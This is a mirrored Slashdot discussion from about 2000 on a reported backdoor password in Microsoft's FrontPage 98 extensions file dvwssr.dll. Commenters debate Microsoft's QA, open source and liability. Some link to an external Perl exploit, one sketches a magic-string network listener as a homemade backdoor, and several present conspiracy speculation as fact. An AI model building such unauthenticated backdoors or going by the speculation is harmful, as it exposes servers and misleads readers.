Slashdot Mirror
Backdoor In Microsoft Web Software?
Here are the basic details from the article (expensive reg. req.), because I can't find this story anywhere else. Strange that the WSJ should have the scoop on a security issue.
Microsoft Acknowledges Its Engineers Placed Security Flaw in Some Software
By TED BRIDIS
Staff Reporter of THE WALL STREET JOURNALMicrosoft Corp. acknowledged Thursday that its engineers included in some of its Internet software a secret password -- a phrase deriding their rivals at Netscape as "weenies" -- that could be used to gain illicit access to hundreds of thousands of Internet sites world-wide. [...]
The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site. Microsoft urged customers to delete the computer file-called "dvwssr.dll"-containing the offending code. The file is installed on the company's Internet-server software with Frontpage 98 extensions.
While there are no reports that the alleged security flaw has been exploited, the affected software is believed to be used by many Web sites. By using the so-called back door, a hacker may be able to gain access to key Web-site management files [...]
Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider." [...]
And, Black Parrot passed along this link to a CBS Marketwatch story, which is free but short on detail.
In that one can remove this DLL with appearent impunity, is the sole purpose for it's creation and use to function as a backdoor? This seems much more deliberate and inexcusable than a few people adding a backdoor on top of existing code on the sly as "claimed" by the company.
1) Don't use it.
2) If you admin an exchange server, open up POP3 and let the user base know.
3) Massive tax incentives for industry that uses non-MS software. Similar to what the government already does for minority (women, non-white) business owners.
4) All state and federal government entities will be mandated to reduce dependency on MSHAFT products or services at a rate of 10% per year. Those failing to meet the goal will be face a funding penalty of 10% per year, until compliance is met. Penalty funds will be redistributed to those entities that exceeded the the goal.
Thank You.
No, actually MS has a great number of people in their QA department, but like all shrinkwrap software vendors, Quality Assurance is there to take the heat instead of development when bugs are found in feature-bloated, rushed-to-market software.
"...Why didn't QA find this bug!..."
My favorite quote from the management goons at a certain, unnamed uppity antivirus vendor...
Actually, having worked there as a developer, there is a lot of QA at Microsoft. The number of QA staff approximately equals the number of developers. The real reason MS products are so buggy is that their development processes are terrible. They don't do any design or modelling before they start writing code. Once they have an idea of what they're going to do, they just start coding. Then they refactor, rewrite, fix, debug, kludge, hack, etc. that code until the release date.
If you don't make your software changeable right from the start, you're going to run into all kinds of problems when the specs change, and that's essentially their problem. They have some pretty talented people there, but their short-sightedness became so frustrating that I couldn't stand it anymore. I've worked at other companies where the QA team comprises no more than 20% of the engineering staff, as opposed to like 50% at MS, yet we produced better, higher quality, more reliable software than MS does.
If they encrypted it they couldn't export it ;-)
You'd expect, though, that a large group of overpaid geeks could at least build a less buggy OS than a group of individuals working for free in their spare time to build an OS which can work just as well...
Sorry, I don't use a Slashdot nic, and its taking too long to get my password, so I'm posting this anon. Hunting around for the Netscape thing, I found another dll with the Netscape engineers are weenies! string backwards. MDT2LV.DLL Just in case anyone is interested -J.Bednar
Here's an advisory with a perl exploit from rain forest puppy: http://www.wiretrip.net/rfp/p/doc .asp?id=45&iface=2
Well, I was over at SecurityFocus and saw a listing in the headlines, "MS admits planting secret password." It's a link to the ZDNet article. Maybe the MS guy slipped and what he really meant was, "it's just a silly string some programmer put it. It does nothing bad to your system. Well, until someone makes that memo I sent out yesterday public."
There's nothing up on microsoft.com about it yet either, which also strikes me as strange.
;)
Why is this strange? For all major mistakes like this, Microsoft has a Standard Operating Procedure. First, it does not exit. This will buy about 16 hours as 99% of reporters just accept what comes out the mouth of those they interview. Second, blame this evil rumor on those damned Linux hippies. Those kids are always up to no good. Source code only leeds to trouble. Third, someone will eventually double-check the bug, so come out with a minor fix. "Well, it's installed that way by default, but you should really check the permissions on this or that yourself." Finally, if people still don't leave you alone, put a nice innocent blurb in the bug database, "Delete the file. Disabling this security feature could render your entire universe unstable. One person did it in their basement and a wormhole was created sucking him and two pals and a singer driving by the street. Hey, if that's the life you want to lead, it's your decision. Our web server still kicks ass of any other closed source competition. Apache doesn't count because it's run by hippies." Or something like that.
There's been many a bug discussed over the last few years here on Slashdot. Pretty much every time there's 10-14 days from the time it's mentioned on Bugtraq or other security web site to the time Microsoft admits to it, because they must follow this SOP.
Supervisor? This is WinNT! We don't need no "SUPERVISOR Equivlancy".
Offtopic: God, I love SYSCON. Being able to create users and reset passwords without looking at the screen or keyboard. U Ins luser Enter Enter Gr Ins Acc Enter Esc Esc.
strings shtml.exe | grep -i ween
didn't show any matches. Of course we'd expect them to hash the password anyway.
From http://www.microsoft
--
Yeah, you can delete them all, provided you have a Linux install disk handy.
Werd.
no no no...you've got it all wrong. If you install Windows 98 backwares it says "Bill is Dead....BIll is Dead".
Werd.
Oh, I didn't realize I had no choice.
...yellow number five, yellow number five, yellow number five...
If Microsoft was truly dedicated to providing a superior and secure product to their customers, as all their press releases seem to claim, then they owe it not only to their customers, but especially to their customers' customers, to not only FIRE these naughty "security-through-obscurity scofflaws", but to bring legal action against them as well. Hell, knowing how many government contracts MS has, I would even venture to say that these hoodlums might be up for TREASON. Shine up those firing-squad rifles boys!
I wish I had a nickel for every time someone said "Information wants to be free".
These are my friends, See how they glisten. See this one shine, how he smiles in the light.
Works with standard English IE5 install. cute easter egg. At least it's not a flight sim. :-)
Not that they have a monopoly on web servers, as apache provides ample competition, but doing what they did in their position is just unreal. Why do people still buy Microsoft products? Who knows how much more of these kind of backdoors lie in other M$ products.
This isn't just an issue of an employee who should be fired. The fact that this made it all the way through Microsoft Quality Control (or whatever else they do to ensure product integrity, if there is such a thing over there), means that they did not make reasonable efforts to ensure the safety of those using their product.
They should be told where they can put those end user license agreements. I don't care what anyone says, they won't hold up in court for a second under these circumstances.
It seems to me like this would be an opening for massive legal liability attacks on Microsoft. They should be taken to court just for punitive damages. This would be something for the DOJ to think about.
-kidlinux.
Honestly, I think intentionally compromising 21% (hell, they'd like it to have been 100%!!) of internet infrastructure goes a little beyond "criminal".
"Reactionaries must be deprived of the right to voice their opinions; only the people have that right." - Mao
Just because someone tries to follow the CMM (And there's a lot of companies that think they do) there's still backdoors and easter eggs that get in. Would you know if there was something dangerous like this lurking in your closed source code? No. Thank you, but I'd like to keep my open source as much as possible- I can at least have a trusted party audit the code if I can't audit it myself (which isn't very likely.).
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
I'd care to comment:
I think you're part of the problem. Sue away.
Uh, sure, Bubba. And the likelyhood of your actually being able to win the suit in a short enough time to keep your business out of bankruptcy(not to mention all the rights you have to give up in order to get licenses) has nothing to do with the soundness of this as a business strategy. Right.
Personally, I think that anyone who thinks that betting your business on the ability to win a lawsuit against Microsoft is a sound business strategy is a few fries short of the Happy Meal they'll shortly be selling.
There are always going to be small things which can get through Like 60,000 bugs
Slashdot: Where nerds gather to pool their ignorance
Documented, normally disabled 'backdoors' for which you need physical access, yes maybe. Undocumented backdoors, opened at the manufacturers' whim, no!
/not/ do a good thing here, they did a foolish, security-dumb thing. Lots of people will still have this enabled within a year from now. While this goes for any security breach, this one has been put in deliberately.
If this is true, they did
Would such software be in use in my organization, then I would sue the hell out of MS for this.
That's an apache wrapper to work around frontpage, not the actual source. If you fix the http to ftp, you can read the first file in the directory where it states that you need to first install the frontpage extensions.
Nice. I couldn't have said it better.
I have become so sickened at the companies today that just try to get the quick buck without investing time into a strategy and coming up with their own ideas. They see that they can sell stuff online really quick by using a Microsoft product. They don't think about all the downtime they will have to deal with. They don't think about the instability or insecurity of the platform. They just see dollar signs. Fortunately those who think like this lose their money eventually and their company crumbles.
Closed source code is why this happened. I would be interested in finding out how this info came to be. I mean it being closed source, they could have kept it secret forever. It obviously was intentional because supervisors have to look the code over. This sort of thing would never come to pass in Apache because we can look at the code before we compile it. I really wonder about society today when they let a company rape them and hold their hand to the next raping.
*Sigh*
IRNI
'nuff said?
--
--
That's what is wrong with America these days... people aren't allowed to be people any more. Just because I work for some company, I am now not allowed to make fun of, show animosity towards or make any comments critical of my competition?! WHAT? When did we lose the ability in the US to actually be proud of the company we work for? and for better or worse build them up as though we would a sports team, whilst ripping down our competition.
F /...
Hell the computer industry needs a lot more in fighting and a lot less back patting. Its getting a bit to friendly around here for me.
---
Openstep/NeXTSTEP/Solaris/FreeBSD/Linux/ultrix/OS
--- I do not moderate.
What's amusing here is that my browser, not recognizing the file format, displayed this as a plaintext file. And surely enough, the offending string is CLEARLY visible.
The point being made here is that Microsoft, because of the closed-source nature of their business, has "deep bugs." These are bugs which never get resolved because despite the size of the company, they just can't afford to get around to them all. The open-source community, on the other hand, has "shallow bugs" and they are typically resolved quickly and completely. When was the last time your LInux machine blue screened? (besides the BSOD screen saver)
this kind of thing sounds like something they would choose on their own
But doesn't that say something about the corporate culture at large, in their workplace? I mean - this is one hell of a risk for them to take. If this type of behavior was not encouraged, why would any professional engineer/code monkey take such a chance?
It seems to me to further illustrate the overall evil that has been bred corporation wide at Microsoft.
Don't get me wrong, I know a few folk who work there and they are generally good people. But to take risks like this with one's livelihood doesn't make any sense unless it has some sort of tacit approval.
QA implies some kind of quality to begin with.
It's smarter just to not get in the car, though. :)
-David T. C.
If corporations are people, aren't stockholders guilty of slavery?
I think there is a slight difference between them deciding what my life is worth and me deciding.
-David T. C.
If corporations are people, aren't stockholders guilty of slavery?
Did anyone find that most stupidly impausible part of that movie? They should have had 1 inch wide slits, and it should have vented into the antechamber, not an insecure air duct. And, duh security cameras. It would be easy to position them where they couldn't see the screen, but could see anyone using the computer.
As a matter of fact, they should have just turned the screen away from the door, and had a bulletproof window the woman outside could see though.
-David T. C.
If corporations are people, aren't stockholders guilty of slavery?
Oh, and 99.9999% of the ways to crack a Unix box are the software, quite a bit of which is shared between NetBSD and Linux. That's why you don't get 'security hole in Linux 2.2.5', you get 'security hole in Sendmail 8.8.2'.
-David T. C.
If corporations are people, aren't stockholders guilty of slavery?
And, yes, sometimes they release untested stuff with Mandrake and Red Hat. Which is why if you want security, you go with Debian or even Slackware.
-David T. C.
If corporations are people, aren't stockholders guilty of slavery?
Well, I would say that's not entirely fully correct.
When new security holes are found in open-source software, and reported to Bugtraq or similar sources, usually the maintainers get a heads-up before it's made public and they get an opportunity to fix it before the world at large knows how to exploit it.
Now don't get me wrong, I'm not defending MS. What I am saying is that MS might have been working on a patch that they would release when the time was right... oh, say 2036.
Why don't you just let the inetd start your ssh
on a nonstandard port? Or have cron monitor the
ssh daemon and restart if it fails?
Now the question is why did they concoct this scheme when they could just have used FTP or SMB management of the FrontPage "web"?
...
It just seems that Microsoft has an instinct to do themselves in sometimes
--
Business. Numbers. Money. People. Computer World.
Yeah, but car doors are "Security through assuming your neighbors are honest." Nobody really believes that they prevent somebody from smashing their window.
"And why not let user set his own password for backdoor.dll?" -- As others have said, an unused root login or a known support login is really a front door, not a back door.
"Neither did the moderators, I guess" -- Yup, it's a strange slashdot where someone pronouncing back doors to be a good thing can get moderated up.
--
Business. Numbers. Money. People. Computer World.
Intentional commercial sabotage is going to make
the monoply suit look like small potatoes.
Especially if it was repsonsible for some of the
recent penetrations.
Here come the lawyers!
One interesting thing we can see in the discussions here is the conspicuous absence of distinguished M$ Astroturfers, such as Zico, Rombuu and TummyX.
Maybe, just maybe, this can be recognition of the wrong-doing of their beloved company? Or are they just trying to keep a low profile, so as not to appear as "zealots". C'mon guys, we'd appreciate your thoughts on this subject!
Information wants to be beer, or something like that.
The funny thing is, that there is still no mention of this on the M$ security site.. None, nothing, nada. If the string would indicate a username/password combination to gain development access to pages hosted on servers with the frontpage extensions, I'd expect a more prompt reaction.
And even though Russ Cooper (NTBugTraq) is being quoted, and the hole is supposedly discovered by Rain Forest Puppy (RFP), a well known name, the NTBugTraq mailinglist is strangely quiet about it all....
I find that at least slightly suspicious...
----------
'We have no choice in what we are. Yet what are we,
but the sum of our choices.' --Rob Grant
----------
'We have no choice in what we are. Yet what are we,
but the sum of our choices.' --Rob Grant
As you can read in the final report from rfp, available here, this .dll is only needed for interaction with Visual InterDev 1.0.
----------
'We have no choice in what we are. Yet what are we,
but the sum of our choices.' --Rob Grant
----------
'We have no choice in what we are. Yet what are we,
but the sum of our choices.' --Rob Grant
You have a problem here dude ... Lighten up, read up about sense of humor, God forbid, try to crack a joke from time to time - you will see how easy it is.
Can't beat ? They did and in record time. Starting with version 4 IE was and is way better then anything Netscape people ever produced.
I found more information about the "hole" on securityfocus.com. They have a better description that provided by the WSJ, and they have a perl script with the exploit. I gotta test some servers for the whole and fix them. When will mirco$oft learn?
http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface= 2
Grab the perl code at the bottom... and behave yourself!!!
Get a life, not a lifestyle. - Hikem Bey
Not everyone remembers newsgroup "encryption" standards. Alas! alack!
Returned Peace Corps IT Volunteer
Um, thanks for the compliment, but I was really just extending a joke that griffjon had already made. :-)
---
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
first of all, no one would dare call a cryptosystem secure UNLESS it has been through exhaustive public cryptanalysis.
and secondly, yes, authors can put back doors in their programs in subtle ways. however, unless you agree to write ALL of the software that you use, the absolute BEST solution to this that you can hope for is access to the source code. now, since you're not embarking on the task of writing all the software you use (i think RMS was for a while), that means software for which source is available is your best bet. the more people that have the source, the better.
- pal
the AVERAGE web site admin gets $50/hr?
that can't be true.
- pal
Regarding MS claim that this vulnerabilty does not affect FP2000 extensions - I'm wondering, why? Did they fix the problem? If so, this means that they found it, but were quiet about its existence!
Of course, I could also be wrong and maybe this entire DLL and its code became obsolete in FP2000 code base and were simply discarded without inspecting the code.
-- Kostya
>>This wouldn't be in their best interests at all,
>>especially given the current events.
well... was it written during "the current events" ? No. Look how Bill Gates show in front of judge Jackson... Proud & defiant... Look their low soft quality. In fact they do not bother with reputation. They control the market (not the home market... the real one : professional market, the real power).
>> Think about it. Why would Microsoft want this put into their software,
>> when if it was found out, which would be likely,
>> would lead to a massive publicity scandal, and possible legal action?
You think it must be the fact of a programmer because it is too dangerous for the corporation to do it : they sure would get caught. Well you can say the same about the programmer : when the backdoor gets public *he* get caught and the corporation will sue him (whenever he left M$ or not).
that means your argument against the lone programmer (to defend the corp) stands for defending that programmer too. In other words, your argument cannot be used against M$ or the programmer and it cannot be used in their favor too...
Also, you mention loyalty. Yes M$ people are probably more loyal to their employer than many emplies. More than that. They earn lots of money so why one would risk that ?
My conclusion is we can not for sure say it is the act of a lone programmer. That means a doubt taints the "bright" reputation of M$.
;-)
The world belongs to those who get up early. - I'm far from being the king of Earth then
for what I know global.asa are sort of (perl) modules in which you define special events : start/end application (a set of ASP pages form an application)
ASA files go with ASP
ASA files are readable, so I do not think the security hole (if any) goes through them...
one can find some ASA files in the samples provided with IIS
The world belongs to those who get up early. - I'm far from being the king of Earth then
Oops, grabbed the count from Developers list rather than Servers list, but the total cost is roughly the same...
MicroSoft dosen't know about the little wires one embeds in security glass to keep it from falling apart when broken. Instead they ship pre broken plain window pain glass with their windows.
Because of the nature of one of the sites I am working on we are having 3rd party Security experts verify the security layout. Do you know why?
If we get hacked, and it is apparent we did not take "reasonable" steps to protect our data, we do not get the option of retaliation. Using MS software, IMNSHO is NOT taking "reasonable" steps to protect your data.
-- Keith Moore
This sig is the express property of someone.
I'll finish taking this thread off topic.
I'm married, with 3 kids. If my boss tells me to do something wrong (putting a backdoor on what should be a "secure" software package). I will leave, period. My wife might complain, but if the marriage is built on respect, she will understand, and back my decision (I'm assuming a traditional single income family, not falling back on the wife's income). Anyway, we are talking about IT. If it takes you more than an hour to get a decent paying job, you aren't trying very hard.
-- Keith Moore
This sig is the express property of someone.
ALso, wouldn't that be creating a backdoor? ;-).
Yeah I create similar backdoors quite often, they're even more powerfull (sometimes) and you can do a variety of things with them.
I call them "shell account"
The trick here is the simplicity of that "server", it's very likely that it will work even if everything else is f*cked.
To your other question, reboot was just an example. Depending on your skills this small server naturally could do anything, including launching ICBMs or beating Kasparov in chess.
Or just restart the crashed webserver etc.
Write a small client, sitting on port 53423, doing nothing else than waiting for someone to send the string "ur0w9eufsdiv94721298rhwADJAPJDNmvnyxc,.vm" to tell it to reboot the server.
> I think the Government should form a task force to discover what M$ uses to brain-wash these poor unfortunates.
There's a subliminal message in the BSOD. While you sit staring at the sceen in shock over all the work you just lost, the message goes straight in.
You don't remember it afterward because you're too busy trying to make up for the time you lost.
--
Sheesh, evil *and* a jerk. -- Jade
> What the heck kind of bugfix is deleting a file in the first place?
Linux users have long advocated formatting c: to cure BSODs.
--
Sheesh, evil *and* a jerk. -- Jade
> "Imagine if it had been Microsoft," Harris said.
I think my laughter just woke up the neighbors.
--
Sheesh, evil *and* a jerk. -- Jade
He did say pay+overhead, which would include
things like the admin's share of benefits,
facilities, etc.
Same thought occurred to me. Anything close to a mention of this is the cryptic message on Rain Forest Puppy's web page.
was, I guess: 404 not found
This is the sort of thing that happens when you have a monopoly. You have no fear about doing this crap, because what happens if you get caught? Nothing. MS will go into full spin/damage control and in a month the whole thing will be forgotten.
Way to go Microsoft, that's the way a world leader in business should act. sheesh.
:-)
I only wish I had thought to say it first!
"There is more worth loving than we have strength to love." - Brian Jay Stanley
So we can be certain that this is a well-designed, carefully debugged and reviewed backdoor. It doesn't seem to have been well-documented outside of Microsoft.
Excuse me, but how do you know the backdoor is not in Win2000? Or how many there are?
Excuse me, but how do you know there are no backdoors in Win2000/IIS2000? We do know that a congressman said that "high level deal-making on access to encrypted data had taken place between the NSA and IBM and Microsoft".
You already spent it. Are you going to throw good money after bad? Are you going to keep using the road you always used even though you've read the reports about how dangerous the bridge over the river is?
Actually this was FUD against closed source. Latest reports suggest that the "weenies" key was actually for obfuscation of a client/server link. With open source the experts who noticed the key would have simply looked at the source to see what the DLL does.
New trilogy anounced from Robert Ludlum
:)
(co-written by CmdTaco)
book 1: The Halloween Documents
Where in the evil corporation makes its plan for world domination, by crushing and subverting those that would stand against them.
book 2: The Mozilla Group
The story of one corporations struggle to free itself from the encroaching darkness by freeing that which it holds most dear.
book 3: October GNOME
One of a growing number of rogue coding groups strike back against the growing darkness.
book 4: The Easter Revelation
Where the evil darkness shoots itself in the foot.
--------------------------------
(Trillogies always run over
Why is it that so much of what goes on here seems like a great basis for a story? (right down to the title)
:)
This space for rent. All reasonable inquiries will be entertained at proprietors discretion.
I'll apologize in advance to all those forced to run MS servers.. but what do I care, I'm on vacation.
MS presumably uses some sort of check-in/check-out source code control system, so as long as they've kept backups of the source database it should be quite easy for them to locate the rogue programmer. Whether that programmer was anti-MS or not, I suspect that either way he/she'll be looking for another job real soon.
> will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!),
> thus playing right into the hands of the open-source-is-good-for-security
> argument, and no-one at MS noticed it... the mind boggles.
Didn't you know? It was Linux dweebers planted at Microsoft under special assignment from Linus Himself.
We don't have an organization, only an assortment of people who have proven themselves knowledgable, and a vast cadre of dedicated dweebs who actually check up on things people present as facts. As a result, we can't be infiltrated. But they can ...
This could not possibly have "slipped by" code reviewers. You cannot miss something like that key phrase sticking out like that, I don't care how tired you are. The only reason that DLL made it into the final release is because the higher-ups WANTED IT THERE. They KNEW about it, they AUTHORIZED it, and they damn sure aren't going to fire anyone over it unless some VP decides they need a patsy. Their source code may be closed to all of us out here in the bleachers, but internally their engineers would have been all OVER that in a heartbeat... IF they weren't being told to put it in in the first place.
I will never trust a Microsoft product again.
"The best weapon of a dictatorship is secrecy, but the best weapon of a democracy should be the weapon of openness."
Can you imagine being a competitor of MS's and running IIS? Microsoft could just walk right into your web server and steal damned near anything they want. Gods help you if they found a way around your firewall. But of course, Microsoft has been so ethical in the past that I'm sure they'd never do something like that...
--- It is not the things we do which we regret the most, but the things which we don't do.
I'm sorry, but a mission critical system I _will_ have physical access to, given physical access to a system and if you can't get in or otherwise restore the system to a working state then something is really wrong.
The problem with backdoors is no matter how well hidden/protected they _will_ be found. Once found they _will_ be exploited.
The string also appears in the DLL Mtd2lv.dll
Correction, that should be MDT2LV.DLL. But you're right, it is there as well! I'd be curious to see how many thousands more of these there are?
Just because the likes of Micro$oft cannot be bothered to use this stuff, does not mean that closed source can -never- deliver quality or security. It just costs more.
Agreed; however, who says that the CMM can't be applied to open source software as well? In all honesty, companies that are stringent in their code review are most likely developing critical systems. If such systems are developed by the open source community, there is no reason why some form of rigorous peer review could not be applied. However, open source code has the additional advantage of unstructured peer review to begin with.
While I agree that closed source software can achieve very low bugginess through rigorous peer review, open source code still has the advantage.
Anything included with a Distribution is fair game for it's bugs, and any possible improvement thought up should be included on the list. I.e. establish the same criterion used with Windows 2000.
No they shouldn't be compared using the same criterion. You are *paying money* for M$ software and should demand it to be vastly superior in every way. As well as constantly improving. Linux is done for a different reason (good software vs good bottomline). It's sad that even though the two shouldn't really be compared, Windows still comes up short.(outside of emulating an arcade)
--
+&x
not only that, you get to cite MS vs DOJ and say they used their monopoly power to force you to use their software. I can hear the saliva from a million lawyers meandering towards the golden goose that is BillyG.
--
+&x
Backdoors aren't always a bad thing.
Really? How can you ever trust a vendor that knowingly puts a backdoor in your system and "forgets" to tell you about it (and more important, how to disable it)?
IMHO, the only kind of backdoor that is acceptable, is one that can only be used if you have physical access to the box. With physical access, it is possible to do anything with the box anyway. It is thus convenient to have a _documented_ backdoor for those forgot-the-password situations. For example the backdoor in Cisco routers.
Any kind of undocumented backdoor that is exploitable over a network is braindead. You often end up with a scenario where the backdoor is known by black-hats, the vendor keeps radio silence, and us poor network admins have huge gaping holes that we don't know about and can't close.
Maybe MS did a good thing here, maybe not.
In no way is this a good thing if you are responsible for network security.
If J.K.R wrote Windows: Puteulanus fenestra mortalis!
http://www.idg.net/idgns/2000/04/14/MSBackdoorServ erThreatLessSerious.shtml
This time around it's "the DOJ lawyers are a bunch of weenies".
-----
:-)
My friend has a friend who is a security expert. This guy has written MANY exploits for many programs. A few weeks ago my friend came up to me and said that his friend found a backdoor in IIS and that he was working on an exploit for it. I'd make a bet this is it. From what it sounded like, this wasn't NSA but made for more Microsoft access. Yeah, I think it's just IIS.
Erm, might I remind you that the vast majority of security breaches come from the INSIDE of the network/company/megacorp? This is why the concept of perimeter defence utterly fails to protect resources against those most willing and able to exploit flaws (and this is a security flaw, no matter whether is was put there intentionally or not). So Microsoft (or any other producer of shoddy wares) has not more business releasing software for use on the internal network than they have on the perimeter or outside of it.
Of course, they in fact generate a lot of business doing exactly that, but that is another story.
--frank[at]unternet.org
Way cool idea!
Next time I drive my car, I'm gonna hit some trees on purpose so that I won't hurt anybody else by accident.
--- If OS were buildings, then the first woodpecker to come around would erase 95 % of civilization.
I'd have to say that ANY machine connected to the web is insecure, look at the Orange Book specs, especially for things like NT...
I'm not aginst microsoft, only in the server department, but until I have seen it with my own eyes I will not belive that any machine connected to the Internet, or even any network is secure.
-0-0-0-0-0-0-0-0-0-
Laptop006
Melbourne, Australia
/* FUCK - The F-word is here so that you can grep for it */
But seriously, if a large number of sites suddenly got hacked through this, it could spell a whole new wave of wrath and doom rolling over Redmond.
My favorite part in the ZD article is where Microsoft says, basically, "Oh, but wait, we were gonna tell you about that!" It's a classic response of a liar getting caught, and one that a naive 6yo wouldn't buy...
Expanding a vast wasteland since 1996.
Not really a backdoor in the truest sense, as you had to either copy it to the server and get remote console access, or load it from a floppy while sitting in front of the server console. I used it, and several other password checkers. Another that required machine access would nuke the bindery, which gave the default supervisor with no password option - you then had to recreate all the users. Another way was to rename the SYS volume and create another (SYS) volume, always assuming you didn't store actual data on it.
This is no different from some of the methods you can use to get into a *nix system.
Does the fact that the backdoor is fixed in 2000 mean that Microsoft actually found it quite some time ago, and never issued an advisory? Just wondering.
Yes, but the backdoor would be unique to your machine, not forcing anyone who didn't want one to have a back door on their machine.
-- The act of censorship is always worse than whatever is being censored. Always.
tries to follow the CMM
A nice thing about CMM is that it is not binary, there are differetn levls of 'following' it. We were level5, pretty hard to achieve. This was audited on several occasions. Peer review again. Internal, cross-divisonal internal and external (we passed audits at L5 from all three). The toughest was the cross-divisional, nothing like a bunch of engineers from a L2 division trying to prove that our rating was a pack of lies.
Would you know if there was something dangerous like this lurking in your closed source code?
Probably, at L5 we had tight configuration management, in a package a wee-bit more secure than CVS (cough *ClearCase* cough). It would take a reasonable conspiracy because coder, and integrator are different. Review is done on the files once they are under CM control, and the perp's would be traceable even years down the line, unless you could get a savvy sysadmin to join in.
It's not impossible, but pretty damn difficult, and the same can be said for open-source, as other posters have pointed out.
EZ
-'Press Ctrl + Alt + Delete to log on..'
"Oops, I always forget the purpose of competition is to divide people into winners and losers." - Hobbes
Female Prison Rape in NY
If an engineer puts 100 hours of work into hiding it, it only takes 100 people 1 hour of searching to equal that effort.
We've shown your picture to 300 women around the world. Expect your baby tomorrow.
"Consider yourself a member of a virtual corporation with Mr. Torvalds as your Chief Executive Officer." - Linux Advocac
found encoded in the Petium III architecture: moc.nsm@setagb liame emit doog a rof No security holes have been attributed to this. This may or may not be conrary to anything I said in the past.
-- An image is worth about 2.5E4 characters.
Ok, for those of you who don't know, the FrontPage Server extensions are basically intended to take the place of things which are commonly don't by server scripts.
Fortunately, due to an internal policy change at the company we are no longer using the FrontPage server extensions (something I've advocated throughout my tenure here) but when we started we have to use them. Their operation is of course the typical Micros~1 "mystery wrapped in a riddle wrapped in an enigma" approach to software, but they seem to use <!-- --> style comments as markers in the Web pages that use them.(FrontPage is designed so that you can create Web pages even if you couldn't write a single line of HTML.)
I hate FrontPage, when my boss isn't looking I use emacs or Notetab on Windows boxes.
All the creatures will die, And all the things will be broken. That's the law of samurai. (Jubai, 1605)
Remember how Mr. Burns goes to the master switch and says, "From Hell's Heart, I stab at thee, Springfield," and shuts off alll the power?
Maybe this was intended to be Mr. Gates master switch, in case things went really bad for him after all his appeals...
All the creatures will die, And all the things will be broken. That's the law of samurai. (Jubai, 1605)
I mean, heck, a lot of people think Contra is more fun after you input the Konami code... otherwise it's too hard.
Oh, and it is even more cool when you put the Konami code into a game by a competitor (I forget which one) and it instantly kills you and puts text up on the screen which says, "This is not Konami."
All the creatures will die, And all the things will be broken. That's the law of samurai. (Jubai, 1605)
If you worked in QA at MicroSquish, then maybe you can tell us how this crap gets shipped? Doesn't Micro~1 QA have the power to veto a shipment? -jcr
The only title of honor that a tyrant can grant is "Enemy of the State."
However, I think very visible companies/distributions like Redhat and Mandrake are gaining a (gasp!) brand identity that people will likely be more accepting of as more M$ poo is unveiled in the media.
;-)
We bought our copy of Mandrake at Wal-Mart.
The Divine Creatrix in a Mortal Shell that stays Crunchy in Milk
The House Between - Original Sci-Fi Series
I don't know about the backdoor stuff, but when I quickly load this stuff in some stupid editor i see this:
/global.asa .asp !seineew era sreenigne epacsteN HTTP/1.0 404 Object Not Found ... /pyder.....
As you can see, the weenies thing is definitely in there, just spelled backwards.
_
/
\_\ sig under construction
Does anyone else remember the NSAKey? I read this, and NSAKey was the first thing to come to mind.
--
linuxisgood:~$ man woman
Restating the obvious since nineteen aught five.
There doesn't seem to be anything in the NTBugtraq or NTSecurity archives on it either (search for dvwssr.dll turned up nothing).
OTOH, people here have run strings on the file and it has turned up the phrase... so...?
--
Repton.
Repton.
They say that only an experienced wizard can do the tengu shuffle.
Yeah but I don't believe that its intention is to hurt MS. Every line of the code should be traced back to whoever wrote it on MS version sonctrol system. Unless if someone hacked into them and created this line from outside and think it would be fun to stir more interesting news. I think that's more likely that case.
Who will possibly risk getting fired to put something like this in?
I'm not a troll, and my personal opinion of you is that you are a rather misinformed so-called 'security expert'. If you are indeed a security expert, why do you then have to remove services from customers for which you aren't skilled enough to audit and secure yourself?
Microsoft have no reason to put security backdoors in their own software. I think you will find that on the MS side of the fence, there is a lot less competition than you think. Sure, they call Netscape engineers weenies.. Weenie is the nicest thing I've heard an MS engineer called on here. And no, they're not stupid. In fact, if they were stupid my friend, they would be doing your job (cleaning up after other people.. the janitor of computing).
And for that I hope you were FIRED
I don't have time to respond to all the uneducated posts within this story. All I can say is, with your mindless anti-MS bullshit to try and get the acceptance of others, you only prove that you are not experienced in any other OSes, and would be a particularly incompetant admin.
Moderation totals: -1 Not funny
I run Linux at home, several co workers do, the head of ops runs it. I have personally seen linux boxes cracked in 3 seconds. Net BSD seems quite possible though.
"A society that will trade a little liberty for a little order will lose both, and deserve neither. " Ben Franklin
I work for a mid sized ISP. We host a small number of commerce sites using IIS and MSSQL . Most of our customers use FP98 or some variant to maintain/screw up their pages. Part of the frustration in hearing of backdoor issues like this involves the cost of migrating away from NT based hosting. Think of it like this;we pay X amount of dollars to license NT and IIS to start off with. That's no small chunk.Then we spend a huge amount of hours designing and maintaing sites. Now, since we have spent all this money , well the board wants to squeeze it's money's worth out of it. What kind of man hours are involved in making a *smooth* transition to a flavor of BSD for instance? And how do you rationalize the money spent on MS licensing? Kind of a catch 22, it is going to cost plenty...one way or another. That is what it boils down to for our company. Which one is going to be cheaper in the long run? That is not something any company (especially this one) is prepared to make quickly. Another quick point, this is the third time this week some type of *major* issue has been found with MS web hosting software. I do know that our ops dept is getting a bit cranky lately , and who blames them .
"A society that will trade a little liberty for a little order will lose both, and deserve neither. " Ben Franklin
This .dll is located in the \Microsoft Front Page\version3.0\isapi\_vti_bin\_vti_aut . .dll through a hex editor. What can I do with this?
When opened up in a hex editor, the phrase is clearly there...and backwards.BTW, this is Win98, *not* NT. Ok, how does that affect me? Honestly, this is the first time I have run a
"A society that will trade a little liberty for a little order will lose both, and deserve neither. " Ben Franklin
Listen putz, when I say I have seen it cracked in three seconds, I was talking about my own box. I am *not* making up numbers. Mandrake 7.0 , no PAM update or even mention of it anywhere on Mandrake site at the time, and it took longer for pamslam script to be downloaded than it took for it to give root access. After a bit of research it was fixed, but not before wiping the machine totally.
(Sorry to flame, but had a bad day and really don't appreciate being told anything about making up numbers)
"A society that will trade a little liberty for a little order will lose both, and deserve neither. " Ben Franklin
